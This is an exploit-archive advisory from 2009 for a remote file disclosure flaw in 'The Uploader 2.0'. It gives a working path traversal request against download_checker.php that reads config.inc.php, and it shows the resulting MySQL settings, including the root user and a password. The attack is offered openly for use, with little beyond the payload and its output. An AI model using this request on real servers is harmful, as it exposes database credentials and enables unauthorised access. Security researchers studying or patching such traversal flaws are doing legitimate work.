[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : The Uploader 2.0 File Disclosure Vulnerability
# Published : 2009-12-22
# Author : Stack
# Previous Title : DeluxeBB <= 1.3 Multiple Vulnerabilities
# Next Title : mypage v0.4 Local File Inclusion Vulnerability
# Title: The Uploader 2.0 Remote File disclosure Vulnerability
# Author: Stack
http://server/the_uploader/api/download_checker.php?filename=../config.inc.php
next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d
//MySQL configuration and connection functions
$main['host']="127.0.0.1";
$main['user']="root";
$main['pass']="jH445Ui";
$main['dbnm']="jkL_database";